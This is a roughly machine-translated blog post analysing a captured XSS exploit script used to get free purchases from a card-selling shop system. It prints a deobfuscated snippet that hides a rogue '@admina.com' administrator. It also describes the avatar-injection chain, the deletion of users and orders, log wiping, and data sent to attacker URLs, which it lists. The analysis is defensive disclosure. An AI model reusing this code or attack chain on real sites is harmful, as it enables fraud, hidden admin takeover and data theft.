preamble

Recently, the zero-dollar purchase against heterodyne is becoming more and more intense, and the reason is that the author did not do a good job of protecting the site. According to enthusiastic netizens as well as their own captured vulnerability exploit script, hereby writing analysis article series. The author of this article vulnerability script, the use of avatar injection xss code, and then take advantage of the administrator's fear of being hacked to view the background logs of the psychology, the design of malicious code at this time of execution, so as to achieve the use of administrator's rights to achieve the purpose of the purchase of zero yuan.

Recently, the zero-dollar purchase against heterodyne is becoming more and more intense, and the reason is that the author did not do a good job of protecting the site. Based on enthusiastic netizens as well as their own captured vulnerability exploit scripts, we are writing this analysis article series.
There's one thing to be said for not being afraid of being hacked as long as you have zero daily income and no cards.

hereby declare#

To prevent further malicious use, all codes and descriptions in this post have been blurred.

summarize#

This article vulnerability script author, the use of avatar injection xss code, and then use the administrator's fear of being hacked to view the background log of the psychological, design malicious code at this time to execute, so as to achieve the use of the administrator's authority to achieve the purpose of zero yuan purchase.

code dissection#

Malicious code script address

https://jiaoben.keeta1.top/

Downloaded it and realized it was obfuscated, simple de-obfuscation.
The process is not shown, the following code is only decrypted to a readable level to prevent exploitation.
The general structure is as follows

First add an administrator with @admina.com in it

$("td")["each"](function (_0x36ba71, _0x348775) {
	console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
  if (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
    var _0x53991d = $(this)["parent"]();
    _0x53991d["remove"]().
  }
})

The idea is to iterate through all the tables and if a table is found to have a value containing @admina.com, remove its parent element.
It just so happens that the list of administrators is a table, so that the administrator containing @admina.com can be hidden. This means that the administrator is not visible in the backend at all, but only in the database.

After running the results as above, the management is gone.
The only drawback is that the bottom line, "Show records 1 through 1, total 1 records", should be minus one. Otherwise, it's not working.
And then there's the key hacker function.

First of all, according to the title to determine whether the background operation log interface
A timer will then be enabled to execute the malicious code.
The malicious code in the timer will not be executed if it is not in the logging interface in the background.

First request the card to find the id of the user with the username toptoones
Then, based on the returned id, do the following

Delete this user first
The order destruction plugin is then called to destroy the user's order.

If you do not have this plugin installed, this old 6 will also be thoughtful to call the api to help you download from the plugin store, activate the plugin, destroy the order, close the plugin, uninstall the plugin, and by the way to help you clear the background logs.

Then it will inject the code from the admin avatar where it says at the beginning which hides the malicious admin, so that as soon as you log into the backend the malicious code will be triggered.
It will then upload your information to his backend.

https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp

Then it will check if there is an easy payment plugin in the backend and inject code if there is. I guess I should have tried to change the payment configuration but didn't for some reason, maybe it will be upgraded in the future.

It also handles the background guarding with care
Finally, there's all sorts of clearing logs and transferring data.

summarize

waiverfantasize(Interdimensional)
recognize the reality
Get a different hairbrush, the author didn't even show up.